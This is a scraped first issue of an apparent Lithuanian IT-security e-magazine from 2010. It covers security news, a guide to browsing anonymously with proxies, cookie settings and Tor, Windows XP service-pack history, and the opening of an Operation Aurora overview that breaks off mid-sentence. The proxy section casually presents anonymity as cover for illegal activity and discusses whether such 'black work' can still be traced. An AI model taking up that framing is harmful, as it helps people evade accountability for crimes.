Upload
alone-zarkys
View
238
Download
0
Embed Size (px)
DESCRIPTION
isauga 2010-09 el. žurnalas
Citation preview
Brangūs skaitytojai,
Jaučiu nenumaldomą norą išleisti, galbūt pirmąjį
Lietuvoje, lietuvišką informacinių technologijų saugumo
elektroninį žurnalą. Tačiau išleisdamas šį pirmąjį numerį jaučiu
ne tik tą nenumaldomą norą pagaliau įnešti šiek tiek ir savo
veiklos į Lietuvos IT saugumo pasaulį, tačiau ir baimę, ir laimę,
nes net neįsivaizduoju kaip jūs priimsite šį elektroninio žurnalo
numerį.
Šiame numeryje aptarsiu kaip išlikti anonimu.
Apžvelgsiu vieną iš svarbiausių šių metu atakų, kuri
paveikė keliasdešimtis pasaulinio lygio kompanijų.
Atsisveikinsime su Windows XP SP2 operacinės sistemos
versija ir pasistengsiu apžvelgti kaip blogi (juodųjų skrybelių)
vyrukai išnaudoja paieškos sistemas ir kaip jų tinklalapiai
pakliūną į aukščiausius rezultatus. Visa tai, ir dar daugiau šiame
numeryje.
Mėgaukitės,
Pagarbiai: A. Zanemunčekovas
Olympus Stylus skaitmeniniame fotoaparate aptiktas virusasJaponijos bendrovė Olympus perspėja savo pirkėjus, kad tie, kurie nusipirko
Stylus Tough 6010 skaitmeninį fotoaparatą gali būti užkrėsti virusu. Virusas yra
šios kameros atminties kortelėje.
Virusas nėra pavojingas iki tol, kol fotoaparatas nėra prijungiamas prie
kompiuterio. Kadangi tai automatinės paleisties [autorun] kirmino tipo virusas,
kuris plinta, kai automatiškai yra paleidžiamas įrenginys, taigi prijungus šį įrenginį prie kompiuterio yra
galimybė užkrėsti kompiuterį. Kitaip sakant naudotojai gali užkrėsti savo kompiuterį tuomet, kai šis
fotoaparatas yra prijungiamas prie jo. Jeigu nežinote kaip atpažinti ar jūsų skaitmeninis fotoaparatas yra
Olympus Stylus Tough 6010 tipo, jūs galite pasinaudoti toliau pateiktu patarimu.
Pagal Olympus bendrovę tik 1700 fotoaparatų yra užkrėsti virusais. Vartotojai gali atskirti savo fotoaparato
modelį pagal jo serijinį numerį. Įvedus savo fotoaparato serijinį numerį į Olympus tinkalalapį, gali peržiūrėti
ar fotoaparatas yra užkrėstas. Olympus bendrovė labai apgailestauja dėl atsitikusio įvykio ir pažadėjo, kad
tokių atsitikimų ateityje daugiau nebepasikartos.
Hakeris nulaužęs Obam`os twitter paskyra išvengė kalėjimoPrancūzų kibernetinis nusikaltėlis išvengė kalėjimo po to, kai nulaužė JAV
prezidento, Barack Obama bei kitų įžymybių twitter paskyras. 23 metų Francois
Cousteix (Dar žinomas kaip - Hacker-Croll) gavo penkis mėnesius lygtinai po to,
kai Prancuzijos teismas pripažino, kad įsilauždamas į Barack Obama, Britney Spears
bei Lily Allen twitter paskyras nepadarė jokios žalos. Francois Cousteix advokatas teigė, kad jis įsilaužė į
šių asmenų twitter paskyras motyvuodamas tuo, kad norėjo perspėti vartotojus apie duomenų nesaugumą.
Cousteix įsilaužė į šių asmenų sąskaitas po to, kai iš viešai prieinamos twitter administratoriaus pateiktų
duomenų atspėjo administratoriaus slaptažodį.
HTTPS Everywhere
Dvi organizacijos užsiimančios privatumo teisių politika išleido naują įskiepį skirtą
firefox interneto naršyklei, kuris užšifruoja interneto naršyklės ryšį.
Papildinys pavadintas HTTPS Everywhere vardu nes jis sukuria saugias HTTPS jungtis
tarp interneto naršyklės ir šių tinklalapių:
Google Search;
Wikipedia;
Twitter;
Facebook;
The New York Times;
The Washington Post;
Paypal;
EFF;
Tor;
Ixquick.
Nėra minima ar šis įskiepis galėtų apsaugoti vartotojus nuo kibernetinių nusikaltėlių atakų kurie įsiskverbia
į tinklo ryšius. Tiesa, ne visuose anksčiau minėtuose tinklapiuose ryšiai yra šifruojami, nes tuose
tinklalapiuose gali būti nesaugus trečiųjų šalių turinys.Būtina pabrėžti, kad tie tinklalapiai, kurių turinys yra
iš trečiųjų šalių interneto vardų gali nepalaikyti HTTPS. Jei interneto naršyklėje pasirodys piktograma su
perbrauktu brūkšniu tuomet reiškia, kad tinklalapis yra pažeidžiamas ir talpina nesaugų turinį.
Įskiepį galima įsidiegti iš https://www.eff.org/files/https-everywhere-latest.xpi
Saulėlydžio fanams gresia virusų atakos
Saulėlydžio filmo fanai perspėjami atsargiau naudotis Google paieškos sistema,
nes garso takelių, filmo aprašymo ieškojimas gali nuvesti į žalingus tinklalapius
kuriuose gresia užsikrėsti virusu. Jei beieškodami informacijos apie saulėlydžio
filmą atsidūrėte tinklalapyje kuriame rodomos iššokančios lentelės, perspėjančios
apie neva esančius virusus jūsų kompiuteryje, nerekomenduojama spausti jokio
klavišo, net norėdami atšaukti nespauskite cancel klavišo. Tokiu atveju į jūsų
kompiuterį gali būti įveisiami virusai. Norėdami iš tokio tinklalapio išeiti, vienu metu spustelėkite CTRL +
ALT + DELETE klavišų kombinaciją. Atsidarius užduočių vykdymo langui išjunkite naudojama interneto
naršyklę. Kibernetiniai nusikaltėliai naudoja Black Hat SEO technika kurios metu Google paieškos sistema
pripompuojama virusuotų tinklalapių iš kurių vartotojams siūloma atsisiųsti netikrą,
virusuotą antivirusinę programą.
Štai kaip viskas veikia:
Į paieškos sistemą saulėlydžio sagos fanas įveda užklausą Twilight Eclipse Release Date;
Parodomi aukštai sureitinguoti kenksmingi tinklalapiai ir vartotojas atidaro vieną iš šių tinklalapių;
Pasirodo netikras iššokantis langas, (pop-up) kuris praneša, kad vartotojo sistema yra užkrėsta
virusais;
Auka spusteli ant prevent attack mygtuko;
Į aukos kompiuterį atsiunčiama virusuota, netikra antivirusinė programa.
Saulėlydžio filmo fanai turi būti atsargus kai ieško informacijos apie saulėlydžio filmus. Privaloma būti
atidžiais net tais atvejais kai atrodo, jog paieškos rezultatai nėra kenksmingi ir visiškai patikimi. Tokios
atakos kibernetiniams nusikaltėliams atneša tonus pinigų. FTB vyrukai sučiupo vieną hakerį, kuris iš tokių
atakų sugebėjo užsidirbti net 163 milijonus dolerių.
Naujas įrankis geba atskleisti interneto slaptažodžiusRusų kompanija Elcomsoft užsiimanti programinės įrangos gamyba, į dienos šviesą išleido
naują slaptažodžių laužimo programą, kuri geba tučtuojau parodyti bei nulaužti Microsoft
Internet Explorer, pašto dėžučių, visų versijų Microsoft Outlook Express, Windows Mail ir
Windows Live Mail slaptažodžius.
Programa vadinasi Elcomsoft Internet Password Breaker ir kaip, kad skelbia jos gamintojai,
ši programa skirta saugumo pareigūnams, baudžiamųjų bylų tyrėjams ir valdžios
institucijoms, kurie galėtų naudotis ekspertizės metu. Pareigūnai galėtų iš karto pamatyti bei nulaužti
slaptažodžius, saugomus kompiuteryje. Elcomsoft Internet Password Breaker programa kainuoja viso labo
49$. Iš tokios žemos kainos galima spręsti, kad ši programa nėra skirta vien tik vyriausybinėms
organizacijoms bei saugumo pareigūnams...
Tai reiškia, kad bet kas galėtų naudotis šia programa ir nulaužti slaptažodžius, net nereikalaujant didelių
techninių žinių. Ši slaptažodžių laužimo programa vartotojams suteikia galimybę iš įvairių resursų gauti
prisijungimo vardą bei slaptažodį. Programa gali greitai sugaudyti tinklalapiuose, formose, automatiškai
įvedamoje informacijoje įvestus slaptažodžius. Elcomsoft Internet Password Breaker geba automatiškai
atpažinti visas palaikomas programas, geba surasti visus varotojus ir .PST failus ir iš jų išgauti saugomus
slaptažodžius. Jei į dienos šviesą išleidžiamos programos, kurios geba vos keliais mygtukų spustelėjimais
nulaužti slaptažodžius ir tokios net nekainuoja 100$, tuomet visoms organizacijoms bei asmeninių
kompiuterių vartotojams reiktų susirūpinti savo saugumu. Siūlyčiau pradėti šifruoti visą kietajį diską .
Kiekvieną kartą, kai komentuojate
tinklalapyje, atsisiunčiate failą iš FTP serverio,
netgi perskaitote straipsnį ar pasižiūrite varžybų
rezultatu, jūs paliekate savo pėdsakus, įrašus apie
jūsų asmeninę informaciją.
Šiuose įrašuose esanti informacija pasiekiama
tinklalapių, serverių administratorių. Iš paliktų
įrašų administratoriai gali nuspręsti jūsų IP adresą,
kompiuterio ID vardą, kokiame tinklalapyje prieš
tai lankėtės, netgi jūsų fizinę buvimo vietą, bei
interneto tiekėjų informaciją, su daugiau ar mažiau
pateikta informacija. Taip pat įmanoma peržvelgti
jūsų naudojamą ekrano rezoliuciją, operacinę
sistemą ir t.t..
Jeigu kas nors norėtų surinkti
konfidencialią informaciją apie jus, jis tūrėtų
pilnas galimybes.
Tačiau jūs neprivalote visiems pateikti
informacijos apie save.
Proxy serveriai
Proxy serveriai yra pirma jūsų gynybos
linija, taigi pradėkime nuo jos. Informacija tarp
kliento ir serverio apsikeičiama kliento – serverio
modeliu. Klientas nusiunčia užklausa (kokio failo
reikia) ir serveris atsiunčia atsakymą į užklausą (į
reikiamus failus). Kartais serveriui būtina pateikti
informaciją apie operacinės sistemos versiją,
interneto naršyklės nustatymus tam, kad serveris
žinotų, kurį tinklalapio puslapį pateikti klientui.
Yra skirtingų tinklalapio puslapių, skirtingoms
interneto naršyklėms. Tačiau paprastai interneto
tinklalapiai nepriklauso nuo interneto naršyklės
nustatymų, todėl verta slėpti šia informaciją.
Ką serveris gauna iš interneto naršyklės ?
Operacinės sistemos pavadinimą bei
versiją;
Interneto naršyklės pavadinimą bei versiją;
Interneto naršyklės nustatymus (rezoliucija,
java / javascript, flash palaikymus ir t.t. ...)
Kliento IP adresą;
Kitą informaciją.
Pati svarbiausia informacija, kurios reikia interneto
serveriui, yra informacija apie IP adresus.
Panaudojant jūsų IP adresą galima nustatyti iš
kurios šalies, kurio miesto esate, jūsų interneto
tiekėją, jūsų fizinį buvimo vietos adresą.
Kiekvienas informacijos vienetas yra tam tikros
vertės rodiklis. Jeigu informacijos vienetas yra
serveriui neperduodamas, tada atitinkamas
kintamasis bus tuščias (jo vertė nebus nustatyta).
Kliento informacija nustatoma keliais
kintamaisiais:
$_SERVER['REMOTE_ADDR']; - Kliento IP
adresas;
$_SERVER['HTTP_VIA']; - Jei šis kintamasis nėra
tuščias tuomet naudojamas proxy serveris.
Kintamasis nustato proxy serverio (ar serverių)
adresus;
HTTP_X_FORWARDED_FOR; - Jei šis kintamasis nėra
tuščias tuomet yra naudojamas proxy serveris. Šis
kintamasis saugo kliento realų IP adresą.
HTTP_ACCEPT_LANGUAGE; - Kintamasis nurodo
kuri interneto naršyklės kalba yra naudojama
(kuria kalba atvaizduoti tinklalapį).
HTTP_USER_AGENT; - Kintamasis parodo kliento
interneto naršyklės pavadinimą, versiją bei
operacinę sistemą.
HTTP_HOST; - Tinklo serverio vardas.
Tai tik maža kintamųjų dalis, kuri gali
parodyti asmeninę vartotojo informaciją. Iš tiesų jų
yra kur kas daugiau (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING,HTTP_CACHE_CONTROL, HTTP_CONNECTION,SERVER_ADDR, SERVER_SOFTWARE,SERVER_PROTOCOL, ...).
REMOTE_ADDR = 66.90.73.223
HTTP_ACCEPT_LANGUAGE = US
HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en)
Presto/2.5.24 Version/10.54
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5
Ši informacija gali būti naudojama įvairių
hakerių, kurie nori užkėsti jūsų kompiuterį virusu.
Taip pat surinktais jūsų pėdsakais naudojasi įvairios
reklamos kompanijos, kurios seka jūsų aktyvumą
internete. Vėliau iš tokių kompanijų sulaukiate
šlamšto laiškų.
Norint apsisaugoti nuo hakerių, įvairių
reklamos agentūrų, bei norint nuslėpti savo pėdsakus
internete geriausia naudoti proxy serverius, kurie geba
paslėpti jūsų paliekamą
informaciją, leidžiant anonimiškai naršyti
internete.
Proxy serveriai tarp mašinos ir interneto
užtikrina papildoma tarpininkavimo sluoksnį. Šių
sluoksnių yra kelių tipų, tačiau web proxies ir
Socks proxies yra svarbiausi.
HTTP proxy šie proxy serveriai perduoda
tik http protokolo duomenis, tad tinka tik WEB
tinklalapiams naršyti.
Socks proxy tai proxy perduodantys ne tik
http, bet ir kitų protokolų duomenis. Šie proxy gali
būti jungiami į proxy serverių grandinę. Socks proxy
dažniausiai nėra prieinami viešam naudojimui.
WEB proxy, šie proxy serveriai veikia per
interneto tinklalapį. Web serveryje paleidžiamas tam
tikras PHP arba ASP skriptas (scenarijus), kuris ir
atlieka proxy serverio vaidmenį. Tokie proxy turi
daug trūkumų, dažniausiai neleidžia perduoti formų
duomenų, blokuoja javascript skriptus, nesupranta
rėmelių, atidaro papildomus langus ir rodo įvairias
reklamas. Žinomiausi skriptai - PHPproxy ir
CGIproxy.
Proxy serverių naudojimas
Yra du skirtingi proxy serverių naudojimo
metodai ir kiekvienas iš jų turi savų pliusų bei
minusų.
Pirmas metodas – naudotis interneto paslaugų
proxy serveriais. Tokios sistemos pagrindinė
sudedamoji dalis yra langas. Šiame lange įvedate tos
interneto svetainės adresą, kurią norite aplankyti.
Kiekvieną kartą aplankant skirtingus tinklalapius,
reikia į tokios sistemos pagrindinį langą įvedinėti
norima aplankyti tinklalapį. Kai įvedate tinklalapio
adresą ir spustelėjate submit, surf anonymous, hide my
ass, go mygtuką prieš pat duomenų siuntimą, jūsų
visa asmeninė informacija užšifruojama. Tokiu būdu
galite anonimiškai naršyti po įvairius tinklalapius bei
atlikti kitą neteisėtą veiklą.
Tačiau nereikia pamiršti, kad atliekant juodus
darbus, jūs naudojatės interneto paslaugų proxy
serveriais dar nereiškia, kad jūsų nesuseks. Nulaužto
serverio, tinklalapio administratorius gali kreiptis į
tuos serverius kuruojančius administratorius ir gali
paprašyti pateikti jų žurnalo įrašus (logus).
Taip pat išlieka galimybė, kad galbūt šiuos
serverius kuruoja dideli, pikti dėdės su FBI
ženkliukais...
Interneto paslaugų proxy serveriai:
http://www.hidemyass.com/;
http://proxy.uzeik.net/;
http://anonymouse.org/anonwww.html;
http://www.megaproxy.com/freesurf/;
http://www.surf-anon.com/;
http://proxify.co.uk/;
http://turbohide.com/ ;
Ir t.t..
Vienas iš pagrindinių veiksnių, trukdančių
naudotis interneto paslaugų proxy serveriais, tai,
kad kiekvieną kartą norėdami anonimiškai naršyti,
jūs turite aplankyti šio tiekėjo namų puslapį.
Galima proxy serverių tinklalapį nusistatyti kaip
namų puslapį tačiau, pripažinkite, vistiek
nepatogu.
Taip pat naudojantis šių tiekėjų
paslaugomis ir anonimiškai naršant po tinklalapius
matote erzinančias reklamas, kurios automatiškai
įterpiamos į aplankomus tinklalapius. Juk turi jie
kaip nors išlaikyti savo serverius...
Kitas metodas – savo privatumą galite
apsaugoti tinkamai susikonfigūravus interneto
naršyklę, kuri leistų anonimiškai naršyti, taip
neaplankant jokių proxy serverių tiekėjų
tinklalapių. Kad susikonfigūruotumėte savo
interneto naršyklę jums reikia žinoti proxy serverį
ir kokiu prievadu (port`u) jis yra naudojamas.
Tokią informaciją galima gauti iš viešai prieinamų
proxy serverių sąrašo.
Viešai prieinamų proxy serverių sąrašas:
http://tools.rosinstrument.com/proxy/;
http://proxies.my-proxy.com/;
http://www.proxylistservice.com/Fresh
AnonymousProxyLists/Public%20Proxy%20List.h
tml;
http://www.echolink.org/proxylist.jsp;
http://spys.ru/en/;
ir t.t.
Kai žinosite proxy serverio vardą bei
prievado numerį, interneto naršyklėje pasirinkite
Tool >> Internet Options. Dabar pasirinkite
Connections followed by Settings ir pažymėkite
use a proxy server. Viskas, kas jums liko padaryti,
tai įvesti proxy serverio adresą į adresų laukelį ir
prievado numerį į port lauką.
Proxy nustatymai Opera naršyklei
Settings >> Preferences >> Advanced skirsnis >>
Network >> Proxy Servers... >> pažymėkite
HTTP ir įveskite proxy serverio adresą bei
naudojamą prievadą >> OK >> OK.
Prieš užslapstinant savo tapatybę yra keletas dalykų,
kuriuos jūs turėtumėte žinoti. Nors labai paprasta
naudotis proxy serveriais tačiau yra keletas minusų.
Proxy nustatymai Firefox naršyklei
Tools >> Options >> Advanced skirsnis >>
Network paskyra >> Settings >> pasirinkite
Manual Proxy Configuration >> įveskite proxy
serverio adresą bei prievado numerį. Jei norite šį
serverį naudoti visiems protokolams tuomet
pažymėkitee use this server for all protocol >>
OK >> OK .Viešai publikuojamais, nemokamais
proxy serveriais gali naudotis daugelis žmonių,
todėl gali suletėti viso proxy serverio darbas ir
automatiškai sulėtės jūsų naršymo greitis. Reikia
būti įgudusiam ir turėti šiek tiek patirties, jei
norima surasti patikimą, greitą proxy serverį.
Galite eksperimentuoti su viešai pateikiamais
proxy serveriais iki tol, kol rasite greitą serverį.
Daug efektyviau būtų surasti patikimus proxy
serverius. Norint surasti patikimus proxy serverius
galima pasinaudoti tokiam darbui skirtomis
programomis. Interneto erdvėje pilna tokių
programų ir dauguma iš jų platinamos nemokamai.
Šios programos tikrina viešus proxy serverius,
ištestuoja anonimiško naršymo greitį ir rezultatus
pateikia jums. Šiose programose užtenka
spragtelėti vieną mygtuką ir pasirinkti norimą
proxy serverį.
Proxy programų sąrašas:
Proxy Finder Enterprise [Freeware] ;
Anonymous Guest - Proxy Checker, SOCKS
Manager: 4.00 [Freeware] ;
Elite Proxy Switcher 1.01 [Shareware] ;
Elite Proxy Switcher [133.83 LTL / 47.54
USD] .
Nors kai kurios programos nėra nemokamos,
tačiau verta išleisti keliasdešimt litų, kad
įsigytumėte patikima proxy serverių programą
Slapukai (Cookies)
Slapukai yra maži tekstiniai failai (dažniausiai
mažiau nei 1kb dydžio) kurie sukuriami ir saugomi
standžiajame diske tuo metu, kai aplankote
dinaminį ( ar inter-aktyvų) tinklalapį. Šie slapukai
saugo jūsų asmeninę informacija. Slapukuose
esantys duomenys naudojami tais atvejais, kai
neįvedinėjant jokių slaptažodžių norima pasiekti
vartotojo
paskyra, arba nustatant kliento detales, kurios bus
pasiekiamos kitą kartą apsilankius klientui. Jei
naudojatės bendru kompiuteriu, bet kas gali
aplankyti tą patį tinklalapį ir pasiekti jūsų paskyrą.
Tai gana kebli situacija, ypač jei slapukuose
išsaugoma kreditinės kortelės informacija ir kiti
konfidencialūs duomenys. Windows XP operacinės
sistemos slapukai saugomi
c:\documents and Settings\Administrator\Cookies
Apsilankius šioje direktorijoje lengvai atpažinsite
slapukus. Tačiau, jei tikrai stengiatės rasti visus
slapukus ir niekaip nepavyksta, galite slapukus
ištrinti per interneto naršyklės nustatymus. Per čia
galite valdyti visus Opera naršyklės slapukus.
Slapūkų valdymas Opera naršyklėje
Opera >> Settings >> Preferences.. >> Advanced
skirsnis >> Cookies >> Manage Cookies
mygtukas.
Skirsnis dalyje galite pasirinkti, kad jokie slapukai
nebus saugomi (never accept cookies) arba
uždarant Opera interneto naršyklę ištrinti visus
įrašytus slapukus, (delete new cookies when exiting
Opera) ar kiekvieną kartą klaustų ar norite įrašyti
slapuką (ask me before accepting Cookies).
Slapūkų valdymas Firefox naršyklėje
Tools >> Options >> Privacy skirsnis >>
Iš išsiskleidžiamojo sąrašo (ties firefox will.. )
pasirinkite >> use costum settings for history >>
spustelėkite show cookies... mygtuką.
Jeigu norite, kad slapukai nebūtų saugomi, iš
išsiskleidžiamojo sąrašo pasirinkite never
remember history.
Ištrinti slapukus galite su tokiomis nemokamomis
programomis kaip:
CCleaner,(http://www.piriform.com/download );
Wipe,(http://privacyroot.com/software/WIPE-
download.php ).
Tor projektas
Tor - vienintelis nemokamas tokio lygio
proxy servisas, užtikrinantis aukštą anonimiškumo
lygį, paprastumą ir patogumą.
Tor projektas tai - sujungtas virtualių tunelių
tinklas, kuris leidžia vartotojams ar vartotojų
grupėms virtualioje erdvėje užtikrinti savo
privatumą ir saugumą.
Tor projektas taip pat leidžia programinės įrangos
kūrėjams kurti naujas komunikacijos priemones su
integruotomis privatumo nuostatomis.
Tor leidžia organizacijoms ir asmenims, per
viešuosius tinklus, keistis informacija
nepažeidžiant jų privatumo ribos. Tor tinklo širdis
yra vartotojų kompiuteriuose esantys proxy
serveriai.
Tai reiškia, kad jums dalyvaujant Tor tinkle, per
jūsų kompiuterį taip pat kažkas galės naršyti
internetą, bus fiksuojamas jūsų IP, nors internautas
gali būti Antarktidoje. Tor tinkle atsekti tikrąjį IP
adresą yra praktiškai neįmanoma, nes šis tinklas
yra labai dinamiškas, o jokie žurnalai nėra vedami.
Tor tinklai apsaugo jus nuo internete paplitusių
formų kurios stebi jūsų aktyvumą.
Idėja paprasta – naudojant sunkiai susekamus
maršrutus atsikratyti tais, kurie bando sekti /
stebėti jūsų aktyvumą ir periodiškai trinti jūsų
paliktus pėdsakus. Vietoj to, kad nuo šaltinio būtų
parenkamas tiesioginis kelias, per tor tinklą
duomenų paketai keliauja atsitiktiniais keliais. Jie
keliauja per kelis skirtingus ryšius, kurie slepia
jūsų paliktus pėdsakus.
Taip nei vienas stebėtojas negalės pasakyti iš kur
duomenis atėjo ir kur jie keliaus. Norėdami sukurti
privataus tinklo kelia su Tor, tarp vartojo
programinės įrangos ar kliento palaipsniui
sukuriama užšifruotų ryšių grandinė.
Kiekviena ryšiu grandinė tik žino iš kur gavo
informacija ir kam ją atiduoti. Kiekviena ryšio
grandinė yra užšifruojama tam, kad būtų
užtikrinta, jog niekas negalėtų stebėti ar sekti jūsų
siunčiamų / gaunamų duomenų.
Kai užšifruotų ryšių grandinė sukuriama,
tuomet galima keistis bet kokio tipo duomenimis.
Kadangi kiekviena užšifruota ryšių grandinė saugo
tik tuos duomenis, kurie reikalingi nustatyti iš kur
buvo gauti duomenys ir kur turi būti siunčiami,
taip niekas negali jūsų susekti.
Tor tinklai veikia tik TCP srautu ir gali būti
naudojama kartu su SOCKS. Siekiant didesnio
veiksmingumo, Tor programinė įranga naudoja tą
pačia grandinę tik 10 minučių. Praėjus 10 minučių
sukuriama nauja grandinė tam, kad vartotojas būtų
atribotas nuo ankstesnių jo veiksmų.
Tor tinklai geba nuo įvairių tarnybų paslėpti savo
buvimo vietą. Tor vartotojai gali, neatskleidžiant
savo tinklo ypatybės, prisijungti prie įvairių
tarnybų.
Verta įsidėmėti, kad Tor tinklai negali išspręsti
visų anonimiškumo problemų.
Tor tinklai geba apsaugoti tik tinkle keliaujančius
duomenis.
Atsisiųsti Tor programinę įranga galite iš
http://www.torproject.org/easy-download.html.en
Tikriausiai jau žinote, o jei nežinote skubu
jums pranešti, kad nuo 2010m. liepos 13 d.
Microsoft bendrovė nebepalaiko Windows XP SP2
operacinės sistemos [toliau – OS] versijos. Regis
Microsoft`as ėmėsi ryžtingų veiksmų.
Paanalizuokime šia situacija pesimistišku
požiūriu. Kadangi Microsoft daugiau nebeteiks
saugumo atnaujinimų Windows XP SP2 ir
Windows 2000 OS tai reiškia, kad netiesiogiai
vartotojus verčia atsisiųsti arba SP3 atnaujinimą
(kuris yra nemokamas TIK verslo sektoriuje) arba
pirkti / diegti naujesnę windozę iš ko Microsoft
tikrai pasidarys pelno, vien tik dėl to, kad verslo
sektoriuje ir namų vartotojų rinkoje daugiau nei
pusę vartotojų, kurie naudojasi Windows OS,
naudoja būtent Windows XP SP2.
Optimistiškas požiūris. Microsoft suskubo
rūpintis mūsų, paprastų vartotojų bei įmonių
saugumu todėl ir nutraukė Windows XP SP2
palaikymą.
Tikriausiai įdomu kodėl būtent Windows
XP SP2 operacinės sistemos versija, kodėl ne XP
SP1, XP SP2 ar XP SP3. Panagrinėkime išsamiau.
Windows XP SP analizė
Microsoft pradėjo leisti servisų paketus,
siekdamas pataisyti ir pridėti naujų ypatybių
Windows šeimos operacinėms sistemoms.
Kiekvienas servisų paketas tai visų, ankstesnių
paketų superpaketas , todėl pakanka įdiegi išleistą
vėliausią paketą ir visi ankstesni paketai bus įdiegti
kartu. Tačiau, jei dar turite Win XP be jokių įdiegtų
servisų paketų, jums reiktų pirmiausia įdiegti SP1
paketą ar SP2 paketą, kad galėtumėte įdiegti SP3.
Service Pack 1
Pirmasis servisų paketas (SP1), skirtas
Windows XP OS buvo išleistas 2002m. rugsėjo 9d.
Šis servisų paketas turi vienus iš svarbiausių
saugumo spragų pataisymų, atnaujinimų,
suderinamumų, NET Framework bibliotekų
palaikymą. Šios bibliotekos Win XP OS leidžia
atpažinti planšetinius kompiuterius (Tablet Pc) bei
naują Windows Messenger 4.7 versiją. Pati
svarbiausia ypatybė atkeliavusi su šiuo servisų
paketu buvo USB 2.0 jungties palaikimas bei Set
Program Access and Default programų grupės
priėjimas. Per šį komponentą vartotojai gali
kontroliuoti interneto naršyklės ir instant message
aktyvumą. Kartu su šiuo paketu palaikoma SATA
jungtį turintys standieji diskai, kurie buvo didesni
nei 137Gb (48 bitų LBA palaikymas). Taip pat
šiame pakete yra ir Java virtualios mašinos, bei
IPv6 palaikymas.
2003 m. vasario 3 d. Microsoft išleido
pirmojo servisų paketo a versija. Po įvykusio
teismo su Sun Microsystems šiuo paketų buvo
panaikintas Microsoft Java virtualios mašinos
palaikymas.
Service Pack 2
Antras servisų paketas skirtas WIN XP OS
(SP2) (kodinis vardas Springboard [Tramplynas])
buvo išleistas 2004m. rugpjūčio 25 d. Šis servisų
paketas pridėjo daug naujų ypatybių.. Su šiuo
servisų paketu tapo palaikomas Wi-Fi bei WPA
šifravimas. Internet explorer 6 naršyklėje įdiegta
iššokančių langų (pop-up) blokavimo sistema bei
Bluetooth ryšio palaikymas. Naujame
pasisveikinimo lange, kuris pasirodo kiekvieną
kartą, kai windozė kraunasi buvo ištrintas užrašas
"Professional", "Home Edition" ir "Embedded".
Žalias krovimosi laukelis Home Edition versijoje ir
geltonas laukelis buvo pakeisti mėlynais.
Antrasis servisų paketas pridėjo naujas apsaugos
priemones. Pagal nutylėjimą pradėta naudoti
Windows ugniasienė. Taip pat pridėta duomenų
apdorojimo apsauga, kurią anksčiau buvo galima
lengvai išnaudoti. OS palaikė NX bitų sistemą,
kuri sustabdo įvairias buferio perpildymo atakas.
Antrajame servisų pakete atsirado Windows
Security Center palaikymas kuris parodo visos
sistemos apsaugos būseną, įskaitant ir įdiegtos
antivirusinės programos, Windows atnaujinimus
bei naujosios Windows ugniasienės. Security
Center komponente gali būti pridėtos trečiūjų šalių
antivirusinės programos bei ugniasienės.
Service Pack 2b
2006 m. Rugpjūčio mėnesį Microsoft
išleido antrojo servisų paketo b papildymą, kuris
atnaujino media įdiegimą (Duomenys imti iš
įvairių šaltinių, gali būti netikslumų Aut. Pstb.).
Service Pack 2c
2007m. rugpjūčio 10 d. Microsoft paskelbė, kad
išleido vieną iš pagrindinių atnaujinimų, skirtų
antrajam servisų paketui. Atnaujinimas pavadintas
Service Pack 2c (SP2c). Šis atnaujinimas sumažina
Windows XP operacinės sistemos raktų naudojimą.
Atnaujinimas prieinamas tik sistemų kūrėjams.
Service Pack 3
Windows XP trečiasis servisų paketas buvo
išleistas 2008m. balandžio 21d..
Naujos 3 servisų paketo ypatybės:
Juodųjų maršrutizatorių aptikimas;
Kliento tinklo priėjimo apsauga;
IEEE 802.1X autentifikacijos palaikymas
grupėms;
Aprašomi saugumo nustatymai apsaugos
grupėms bei vietinei apsaugai;
Atnaujintas Microsoft kriptografinio
šifravimo modulis;
Produkto kodo reikalavimas;
Anksčiau išleisti atnaujinimai;
Atnaujinti IPSec filtrai;
MSXML 6.0 SP2 ir XMLLite;
Įdiegiama atnaujinta microsoft valdymo
kontrolės versija;
Palaikomas nuotolinio darbalaukio
protokolas;
Atnaujinta tinklo diagnozės įranga;
Atnaujinta WPA2
Įdiegta Windows Script 5.7;
Įdiegta Windows Installer 3.1 v2;
Windows XP SP3 gali būti įdiegtas ir
naudojamas 30 dienų, be jokio produkto kodo
reikalavimo. Po 30 dienų naudotojas perspėjamas
įvesti teisingą servisų paketo kodą ir aktyvuoti
įdiegimą.
XP SP3 turi visus ankstesnius servisų paketus
skirtus XP OS. Šis servisų paketas patikrinaHKLM_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Windows\direktorijoje esantį CSDVersion registro raktą. Jei
registro raktas yra lygus ar didesnis nei 0x100,
tuomet pradedamas atnaujinimo procesas, kitu
atveju naudotoją perspėja įdiegti SP1 ar SP2.
Kadangi naudotojui paprastai nebegalima atsiųsti
SP1 paketo kaip atskiro komponento, jam reikia
atsisiųsti šį paketą per automatinį Windows
atnaujinimo langą. Taip pat šis servisų paketas turi
papildomų atnaujinimų skirtų OS Windows XP
Media Center Edition (MC) ir Windows XP Tablet
PC Edition komponentams. Su šiuo atnaujinimu iš
ScreenSaver skirtuko panaikinta „energijos
žvaigždutės“ logotipas (Energy Star).
Blaster, Nimda, Code Red ir kiti aukšto lygio
kirminai neabejotinai tapo praeities dalimi, jie
pakeitė elektroninių grėsmių erdvę.
Operacija „Aurora“ dar kartą pakeitė visą
elektroninų grėsmių erdvę. Ši ataka parodė, kad
didžiausios kompanijos yra labai pelningi taikiniai.
Nors „Aurora“ ataka buvo pradėta vykdyti
dar 2009 metų viduryje ir tesėsi iki 2010 m.
Pradžios, tačiau šios atakos užmiršti neįmanoma,
nes šios atakos metu buvo įsilaužtą į daugiau nei
36 kompanijų, tarp jų ir į tokias kaip – Google ,
Adobe Systems, Jupiter Networks, Rackspace,
Yahoo, Symantec, Northon Grumman ir kt.
Operacija „Aurora“ parodė, kad siekiant
kompanijų intelektualinės nuosavybės,
kibernetiniai nusikaltėliai gali būti labai
koordinuoti. Kol didžiųjų kompanijų darbuotojai
ramiai ilsėjosi užsitarnautomis gruodžio mėnesio
atostogomis, kibernetiniai nusikaltėliai siautėjo.
Bet viskas nuo pradžių.
Dmitri Alperovitc, McAfee grėsmių
viceprezidentas pavadino šia ataka Auroros vardu,
nes buvo atrasta, kad „Aurora“ pavadinimas tai
atakuojančios mašinos bylos kelias, kurioje buvo
du kenkėjų failai.
Pagal McAfee, pagrindinis šios
atakos tikslas buvo gauti prieigą prie šių
atakuojančių bendrovių bei pavogti
konfidencialius šių bendrovių duomenis. 2010 m.
